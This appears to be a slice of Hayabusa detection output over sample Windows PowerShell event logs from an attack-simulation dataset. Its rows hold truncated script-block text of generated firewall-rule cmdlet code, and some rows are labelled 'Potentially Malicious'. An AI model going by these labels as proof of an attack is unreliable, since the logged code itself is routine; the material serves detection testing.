$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter)",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter)",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = 
${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParame,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 
10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParame,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,ter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 